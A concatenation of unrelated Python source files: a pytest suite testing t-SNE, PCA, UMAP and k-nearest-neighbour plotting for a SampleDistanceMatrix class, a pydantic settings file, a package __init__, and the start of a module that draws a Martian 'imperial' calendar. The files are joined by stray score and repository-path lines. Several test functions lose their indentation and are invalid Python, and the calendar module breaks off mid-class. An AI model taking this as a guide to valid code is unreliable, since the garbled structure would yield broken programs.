        with pytest.raises(ValueError) as excinfo:
            sdm.tsne_feature_gradient_plot(
                '5', selected_labels=[11], figsize=(10, 10), s=50)
    # Invalid transform, label sizes, and feature ids must raise ValueError.
    def test_sdm_tsne_feature_gradient_plot_wrong_args(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x, sids=sids, fids=fids, use_pdist=False)
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot('5', transform=2)
        # wrong labels size
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot('5', figsize=(10, 10),
                                           s=50, labels=[])
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot('5', figsize=(10, 10),
                                           s=50, labels=[1])
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot('5', figsize=(10, 10),
                                           s=50, labels=[2])
        # wrong gradient length
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot([0, 1])
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot(11)
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot(11)
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot(-1)
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot(5)
        with pytest.raises(ValueError):
            sdm.tsne_feature_gradient_plot('123')
    # Image-comparison test: plain t-SNE scatter with an explicit gradient.
    @pytest.mark.mpl_image_compare
    def test_sdm_tsne_plot(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        g = x_sorted[:, 5]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        return sdm.tsne_plot(g, figsize=(10, 10), s=50)
    # PCA counterparts of the t-SNE gradient-plot tests above.
    @pytest.mark.mpl_image_compare
    def test_sdm_pca_feature_gradient_plot(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.pca_feature_gradient_plot(
            '5', figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # PCA gradient plot with a value transform.
    @pytest.mark.mpl_image_compare
    def test_sdm_pca_feature_gradient_plus10_plot(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.pca_feature_gradient_plot(
            '5', transform=lambda x: x + 10, figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # PCA gradient plot restricted to selected sample labels.
    @pytest.mark.mpl_image_compare
    def test_sdm_pca_feature_gradient_plot_sslabs(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        sdm.pca_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels='a',
            transform=lambda x: np.log(x+1),
            figsize=(10, 10), s=50)
        fig = sdm.pca_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels='a',
            figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # Selecting no labels must still produce a (blank) figure.
    @pytest.mark.mpl_image_compare
    def test_sdm_pca_feature_gradient_plot_sslabs_empty(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.pca_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels=[],
            figsize=(10, 10), s=50)
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    # Mismatched or missing label arguments must raise ValueError.
    def test_sdm_pca_feature_gradient_plot_sslabs_wrong_args(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        # Mismatch labels
        with pytest.raises(ValueError) as excinfo:
            sdm.pca_feature_gradient_plot(
                '5', labels=list('abcdefgh'), selected_labels=[11],
                figsize=(10, 10), s=50)
        with pytest.raises(ValueError) as excinfo:
            sdm.pca_feature_gradient_plot(
                '5', labels=list('abcdefgh'), selected_labels=['i'],
                figsize=(10, 10), s=50)
        # labels not provided
        with pytest.raises(ValueError) as excinfo:
            sdm.pca_feature_gradient_plot(
                '5', selected_labels=[11], figsize=(10, 10), s=50)
    # Invalid transform, label sizes, and feature ids must raise ValueError.
    def test_sdm_pca_feature_gradient_plot_wrong_args(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x, sids=sids, fids=fids, use_pdist=False)
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot('5', transform=2)
        # wrong labels size
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot('5', figsize=(10, 10),
                                          s=50, labels=[])
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot('5', figsize=(10, 10),
                                          s=50, labels=[1])
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot('5', figsize=(10, 10),
                                          s=50, labels=[2])
        # wrong gradient length
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot([0, 1])
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot(11)
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot(11)
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot(-1)
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot(5)
        with pytest.raises(ValueError):
            sdm.pca_feature_gradient_plot('123')
    # Image-comparison test: plain PCA scatter with an explicit gradient.
    @pytest.mark.mpl_image_compare
    def test_sdm_pca_plot(self):
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        g = x_sorted[:, 5]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        return sdm.pca_plot(gradient=g, figsize=(10, 10), s=50)
    # PCA projection is capped at n_samples components (20 here).
    def test_pca_dim(self):
        np.random.seed(123)
        x5k = np.random.normal(size=5000)
        sdm = eda.SampleDistanceMatrix(
            x5k.reshape(20, -1), use_pdist=False)
        assert sdm._pca_x.shape == (20, 20)
    # Explained-variance arrays match the number of components.
    def test_pca_var_explained(self):
        np.random.seed(123)
        x5k = np.random.normal(size=5000)
        sdm = eda.SampleDistanceMatrix(x5k.reshape(20, -1), use_pdist=False)
        assert sdm._skd_pca.explained_variance_.shape == (20,)
        assert sdm._skd_pca.explained_variance_ratio_.shape == (20,)
    @pytest.mark.mpl_image_compare
    def test_sdm_nopdist_umap_feature_gradient_plot_npd(self):
        # UMAP scatter colored by feature '5'; compared against a stored
        # baseline image by pytest-mpl.
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.umap_feature_gradient_plot(
            '5', figsize=(10, 10), s=50)
        # Plotting must not mutate the matrix's data or ids.
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    @pytest.mark.mpl_image_compare
    def test_sdm_nopdist_umap_feature_gradient_plus10_plot_npd(self):
        # Same as the plain gradient test, but with a transform applied to
        # the gradient values before coloring.
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.umap_feature_gradient_plot(
            '5', transform=lambda x: x + 10, figsize=(10, 10), s=50)
        # Plotting must not mutate the matrix's data or ids.
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    @pytest.mark.mpl_image_compare
    def test_sdm_nopdist_umap_feature_gradient_plot_npd_sslabs(self):
        # Gradient plot restricted to the samples with selected label 'a'.
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        # First call exercises the transform code path; its figure is
        # discarded — only the second (untransformed) figure is compared.
        sdm.umap_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels='a',
            transform=lambda x: np.log(x+1),
            figsize=(10, 10), s=50)
        fig = sdm.umap_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels='a',
            figsize=(10, 10), s=50)
        # Plotting must not mutate the matrix's data or ids.
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    @pytest.mark.mpl_image_compare
    def test_sdm_nopdist_umap_feature_gradient_plot_npd_sslabs_empty(self):
        # selected_labels=[] is valid and selects no samples.
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        fig = sdm.umap_feature_gradient_plot(
            '5', labels=list('abcdefgh'), selected_labels=[],
            figsize=(10, 10), s=50)
        # Plotting must not mutate the matrix's data or ids.
        np.testing.assert_equal(sdm._x, x_sorted)
        np.testing.assert_equal(sdm._sids, sids)
        np.testing.assert_equal(sdm._fids, fids)
        return fig
    def test_sdm_umap_feature_gradient_plot_npd_sslabs_wrong_args(self):
        # selected_labels must be a subset of labels, and labels must be
        # supplied whenever selected_labels is used.
        sids = list(range(8))
        fids = [str(i) for i in range(10)]
        np.random.seed(123)
        x = np.random.ranf(80).reshape(8, -1)
        x_sorted = x[np.argsort(x[:, 5])]
        sdm = eda.SampleDistanceMatrix(
            x_sorted, sids=sids, fids=fids, use_pdist=False)
        # Mismatch labels
        with pytest.raises(ValueError) as excinfo:
            sdm.umap_feature_gradient_plot(
                '5', labels=list('abcdefgh'), selected_labels=[11],
                figsize=(10, 10), s=50)
        with pytest.raises(ValueError) as excinfo:
            sdm.umap_feature_gradient_plot(
                '5', labels=list('abcdefgh'), selected_labels=['i'],
                figsize=(10, 10), s=50)
        # labels not provided
        with pytest.raises(ValueError) as excinfo:
            sdm.umap_feature_gradient_plot(
                '5', selected_labels=[11], figsize=(10, 10), s=50)
def test_sdm_umap_feature_gradient_plot_npd_wrong_args(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x, sids=sids, fids=fids, use_pdist=False)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', transform=2)
# wrong labels size
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[])
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[1])
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[2])
# wrong gradient length
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot([0, 1])
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(-1)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(5)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('123')
@pytest.mark.mpl_image_compare
def test_sdm_nopdist_umap_plot_npd(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
g = x_sorted[:, 5]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
return sdm.umap_plot(gradient=g, figsize=(10, 10), s=50)
def test_umap_dim(self):
np.random.seed(123)
x5k = np.random.normal(size=5000)
sdm = eda.SampleDistanceMatrix(x5k.reshape(20, -1), use_pdist=False)
assert sdm._umap_x.shape == (20, 2)
    def test_s_knn_connectivity_matrix(self):
        # s_knn_connectivity_matrix(k) returns a sparse matrix whose entry
        # (i, j) is the distance from sample i to its neighbor j.
        nn_sdm = eda.SampleDistanceMatrix(
            [[0], [1], [5]], metric='euclidean', use_pdist=False)
        # k=1: each sample connects to its single nearest neighbor with the
        # distance as weight (sample 2's NN is sample 1 at distance 4).
        np.testing.assert_allclose(
            [[0, 1, 0], [1, 0, 0], [0, 4, 0]],
            nn_sdm.s_knn_connectivity_matrix(1).toarray())
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=False, use_pca=False).shape == (3, 3)
        # index_params / query_params are only valid together with hnsw.
        with pytest.raises(ValueError):
            assert nn_sdm.s_knn_connectivity_matrix(
                1, use_hnsw=False, use_pca=False,
                index_params={})
        # k must be >= 1
        with pytest.raises(ValueError):
            assert nn_sdm.s_knn_connectivity_matrix(0)
        with pytest.raises(ValueError):
            assert nn_sdm.s_knn_connectivity_matrix(
                1, use_hnsw=False, use_pca=False,
                index_params=None, query_params={}).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=False).shape == (3, 3)
        # hnsw can only handle vectors with more than one non-0 elements.
        nn_sdm = eda.SampleDistanceMatrix(
            [[1, 2, 3], [2, 0, 0], [6, 0, 0]],
            metric='cosine', use_pdist=False)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=False).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=False, use_pca=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=True, index_params={},
            query_params={}, verbose=True).shape == (3, 3)
        # Same combinations with a euclidean-metric matrix.
        nn_sdm = eda.SampleDistanceMatrix(
            [[1, 2, 3], [2, 0, 0], [6, 0, 0]],
            metric='euclidean', use_pdist=False)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=False).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=False, use_pca=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=True, index_params={},
            query_params={}, verbose=True).shape == (3, 3)
        # Per-call metric override.
        nn_sdm = eda.SampleDistanceMatrix(
            [[1, 2, 3], [2, 0, 0], [6, 0, 0]],
            metric='euclidean', use_pdist=False)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, metric='cosine', use_hnsw=True, use_pca=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, use_hnsw=True, use_pca=False).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, metric='cosine', use_hnsw=False, use_pca=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, metric='cosine', use_hnsw=True, use_pca=True, index_params={},
            query_params={}, verbose=True).shape == (3, 3)
        # 'correlation' is not supported by the hnsw backend.
        with pytest.raises(ValueError):
            assert nn_sdm.s_knn_connectivity_matrix(
                1, metric='correlation', use_hnsw=True, use_pca=False,
                index_params={}, query_params={},
                verbose=True).shape == (3, 3)
        with pytest.raises(ValueError):
            assert nn_sdm.s_knn_connectivity_matrix(
                1, metric='correlation', use_hnsw=True, use_pca=True,
                index_params={}, query_params={},
                verbose=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, metric='cosine', use_hnsw=False, use_pca=True,
            verbose=True).shape == (3, 3)
        assert nn_sdm.s_knn_connectivity_matrix(
            1, metric='cosine', use_hnsw=False, use_pca=False,
            verbose=True).shape == (3, 3)
        # Sparse input with explicit hnsw tuning parameters.
        np.random.seed(123)
        x5k = spsp.csr_matrix(np.random.normal(size=5000))
        nn_sdm = eda.SampleDistanceMatrix(x5k.reshape(1000, 5), use_pdist=False)
        index_params = {
            "efConstruction": 5,
            "M": 5,
            "delaunay_type": 2,
            "post": 0,
            "indexThreadQty": 1
        }
        query_params = {
            "efSearch": 5
        }
        nn_sdm._s_knns_hnsw(1, metric='cosine',
                            index_params=index_params,
                            query_params=query_params)
        # k must be >= 1 for the private hnsw helper as well.
        with pytest.raises(ValueError):
            nn_sdm._s_knns_hnsw(
                0, use_pca=False, index_params={})
@pytest.mark.mpl_image_compare
def test_s_knn_graph_grad_lab(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
# use cache
sdm.s_knn_graph(5, figsize=(5, 5))
sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
assert len(sdm._knn_ng_lut) == 1
gradient = np.array([1] * 10 + [10] * 20)
labs = gradient = np.array([1] * 10 + [2] * 20)
return sdm.s_knn_graph(5, gradient=gradient, labels=labs,
figsize=(5, 5),
alpha=0.8, random_state=123)
@pytest.mark.mpl_image_compare
def test_s_knn_graph_grad_lab_same_marker(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
gradient = np.array([1] * 10 + [10] * 20)
labs = gradient = np.array([1] * 10 + [2] * 20)
return sdm.s_knn_graph(5, gradient=gradient, labels=labs,
different_label_markers=False,
figsize=(5, 5),
alpha=0.8, random_state=123)
    @pytest.mark.mpl_image_compare
    def test_s_knn_graph_grad_nolab(self):
        # KNN graph colored by a gradient only (no labels).
        np.random.seed(123)
        x = np.concatenate((np.random.normal(0, 1, 10),
                            np.random.normal(20, 1, 20))).reshape(30, -1)
        sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
        sdm.s_knn_graph(5, figsize=(5, 5))
        assert (5, 1) in sdm._knn_ng_lut
        assert len(sdm._knn_ng_lut) == 1
        # use cache
        sdm.s_knn_graph(5, figsize=(5, 5))
        sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
        sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
        assert len(sdm._knn_ng_lut) == 1
        gradient = np.array([1] * 10 + [10] * 20)
        return sdm.s_knn_graph(5, gradient=gradient, figsize=(5, 5),
                               alpha=0.8, random_state=123)
    @pytest.mark.mpl_image_compare
    def test_s_knn_graph_nograd_nolab(self):
        # Plain KNN graph: no gradient, no labels.
        np.random.seed(123)
        x = np.concatenate((np.random.normal(0, 1, 10),
                            np.random.normal(20, 1, 20))).reshape(30, -1)
        sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
        sdm.s_knn_graph(5, figsize=(5, 5))
        assert (5, 1) in sdm._knn_ng_lut
        assert len(sdm._knn_ng_lut) == 1
        # use cache
        sdm.s_knn_graph(5, figsize=(5, 5))
        sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
        sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
        assert len(sdm._knn_ng_lut) == 1
        return sdm.s_knn_graph(5, figsize=(5, 5),
                               alpha=0.8, random_state=123)
    @pytest.mark.mpl_image_compare
    def test_s_knn_graph_nograd_lab(self):
        # KNN graph with labels only (no gradient coloring).
        np.random.seed(123)
        x = np.concatenate((np.random.normal(0, 1, 10),
                            np.random.normal(20, 1, 20))).reshape(30, -1)
        sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
        sdm.s_knn_graph(5, figsize=(5, 5))
        assert (5, 1) in sdm._knn_ng_lut
        assert len(sdm._knn_ng_lut) == 1
        # use cache
        sdm.s_knn_graph(5, figsize=(5, 5))
        sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
        sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
        assert len(sdm._knn_ng_lut) == 1
        labs = np.array([1] * 10 + [2] * 20)
        return sdm.s_knn_graph(5, labels=labs, figsize=(5, 5),
                               alpha=0.8, random_state=123)
    @pytest.mark.mpl_image_compare
    def test_s_knn_graph_nograd_lab_same_marker(self):
        # KNN graph with labels but a single marker shape for all labels.
        np.random.seed(123)
        x = np.concatenate((np.random.normal(0, 1, 10),
                            np.random.normal(20, 1, 20))).reshape(30, -1)
        sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
        sdm.s_knn_graph(5, figsize=(5, 5))
        assert (5, 1) in sdm._knn_ng_lut
        assert len(sdm._knn_ng_lut) == 1
        # use cache
        sdm.s_knn_graph(5, figsize=(5, 5))
        sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
        sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
        assert len(sdm._knn_ng_lut) == 1
        labs = np.array([1] * 10 + [2] * 20)
        return sdm.s_knn_graph(5, labels=labs, figsize=(5, 5),
                               different_label_markers=False,
                               alpha=0.8, random_state=123)
    def test_knn_ind_lut(self):
        # s_knn_ind_lut(k) maps each sample index to the indices of its k
        # nearest neighbors, ordered by increasing distance.
        nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
                                           [6, 6, 6], [10, 10, 10],
                                           [20, 20, 20]],
                                          metric='euclidean', use_pdist=False)
        # k == 0 yields an empty neighbor list for every sample.
        assert nn_sdm.s_knn_ind_lut(0) == dict(zip(range(6), [[]]*6))
        assert (nn_sdm.s_knn_ind_lut(1) ==
                dict(zip(range(6), [[1], [0], [3], [2], [3], [4]])))
        assert (nn_sdm.s_knn_ind_lut(2) ==
                dict(zip(range(6), [[1, 2], [0, 2], [3, 1],
                                    [2, 4], [3, 2], [4, 3]])))
        assert (nn_sdm.s_knn_ind_lut(3) ==
                dict(zip(range(6), [[1, 2, 3], [0, 2, 3], [3, 1, 0],
                                    [2, 4, 1], [3, 2, 1], [4, 3, 2]])))
        # k == n - 1 (the maximum) must not raise.
        nn_sdm.s_knn_ind_lut(5)
        nn_sdm_npd = eda.SampleDistanceMatrix([[x] for x in range(20)],
                                              metric='euclidean',
                                              use_pdist=False)
        # NOTE(review): both instances are built with use_pdist=False; the
        # "_pd" name suggests this one was meant to use use_pdist=True so the
        # comparison below contrasts the two code paths — confirm the intent.
        nn_sdm_pd = eda.SampleDistanceMatrix([[x] for x in range(20)],
                                             metric='euclidean',
                                             use_pdist=False)
        assert nn_sdm_npd.s_knn_ind_lut(0) == dict(zip(range(20), [[]]*20))
        assert (nn_sdm_npd.s_knn_ind_lut(10) == nn_sdm_pd.s_knn_ind_lut(10))
def test_knn_ind_lut_wrong_args(self):
nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
[6, 6, 6], [10, 10, 10],
[20, 20, 20]],
metric='euclidean', use_pdist=False)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(-1)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(-0.5)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(6)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(6.5)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(7)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(7)
| 2.03125 | 2 |
app/settings.py | rglsk/dynamoDB-fastAPI | 3 | 12762197 | from pydantic import BaseSettings
class GlobalConfig(BaseSettings):
    """Application settings.

    pydantic's ``BaseSettings`` reads each field from an identically named
    environment variable before falling back to the default below.
    """

    DB_HOST: str = "http://dynamodb:8000"  # local/dockerized DynamoDB endpoint
    ENVIRONMENT: str = "test"
    AWS_REGION: str = "eu-west-1"


# Module-level singleton imported by the rest of the application.
config = GlobalConfig()
| 2.046875 | 2 |
videotracker/functions/__init__.py | lysogeny/videotracker | 1 | 12762198 | from .functions import *
from . import abc
from . import params
| 1.273438 | 1 |
web/CalendarImage.py | c4se-jp/martian_imperial_year_table | 0 | 12762199 | """Draw a imdt calendar image."""
from contextlib import contextmanager
from functools import partial
from imperial_calendar import GregorianDateTime, ImperialDateTime, ImperialYearMonth
from imperial_calendar.transform import (
grdt_to_juld,
imdt_to_imsn,
imsn_to_imdt,
imsn_to_mrsd,
juld_to_grdt,
juld_to_tert,
mrsd_to_imsn,
mrsd_to_tert,
tert_to_juld,
tert_to_mrsd,
)
import typing as t
import xml.etree.ElementTree as ET
def next_grdt_day_of(grdt: GregorianDateTime) -> GregorianDateTime:
    """Return a copy of *grdt* advanced by one Gregorian calendar day."""
    nxt = grdt.copy()
    month_lengths = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
    # NOTE: Don't consider about Julian Calendar, before Gregorian Calendar begins.
    is_leap = nxt.year % 4 == 0 and (nxt.year % 100 != 0 or nxt.year % 400 == 0)
    last_day = 29 if (nxt.month == 2 and is_leap) else month_lengths[nxt.month - 1]
    if nxt.day < last_day:
        nxt.day += 1
        return nxt
    # Roll over to the first day of the next month (and year, if needed).
    nxt.day = 1
    if nxt.month == 12:
        nxt.year += 1  # NOTE: Don't consider about B.C. 1, A.D. 1.
        nxt.month = 1
    else:
        nxt.month += 1
    return nxt
def grdt_to_imdt(
    grdt: GregorianDateTime, imdt_timezone: t.Optional[str]
) -> ImperialDateTime:
    """Transform grdt to imdt."""
    # Chain through the intermediate time scales: Julian date ->
    # terrestrial time -> Mars sol date -> imperial standard naive.
    standard_naive = imsn_to_imdt(
        mrsd_to_imsn(tert_to_mrsd(juld_to_tert(grdt_to_juld(grdt.to_utc_naive()))))
    )
    return ImperialDateTime.from_standard_naive(
        standard_naive, imdt_timezone or "+00:00"
    )
def imdt_to_grdt(imdt: ImperialDateTime, grdt_timezone: str) -> GregorianDateTime:
    """Transform imdt to grdt."""
    # Inverse of grdt_to_imdt: unwind the same chain of time scales.
    utc_naive = juld_to_grdt(
        tert_to_juld(mrsd_to_tert(imsn_to_mrsd(imdt_to_imsn(imdt.to_standard_naive()))))
    )
    return GregorianDateTime.from_utc_naive(utc_naive, grdt_timezone)
@contextmanager
def e(
    tag: str, attrib: t.Dict[str, str] = {}, text: str = "", parent: ET.Element = None
) -> t.Generator[t.Callable[[str, t.Dict[str, str], str], t.Any], None, t.Any]:
    """Create a XML element and pass a new context for sub elements."""
    element = (
        ET.Element(tag, attrib)
        if parent is None
        else ET.SubElement(parent, tag, attrib)
    )
    if text != "":
        element.text = text
    # The yielded callable is this same factory, pre-bound to the new
    # element, so nested ``with`` blocks build nested XML.
    yield partial(e, parent=element)
def text_y(y: t.Union[float, str], font_size: t.Union[float, str]) -> float:
    """
    Calculate the y value of the SVG text element.

    y: mm
    font_size: pt
    """
    pt_to_mm = 0.353  # 1 pt ~= 0.353 mm: shift the baseline down by one line.
    return float(y) + float(font_size) * pt_to_mm
class CalendarImage(object):
    """Draw a imdt calendar image."""

    # Color palette (hex RGB); the trailing comments are earlier shades.
    BLACK: str = "#000000"  # "#3b3b3b"
    BLUE: str = "#008dcc"  # "#40a1cc"
    # NOTE(review): FONT_FAMILY_REGULAR is identical to FONT_FAMILY_BOLD —
    # confirm whether a regular-weight stack was intended here.
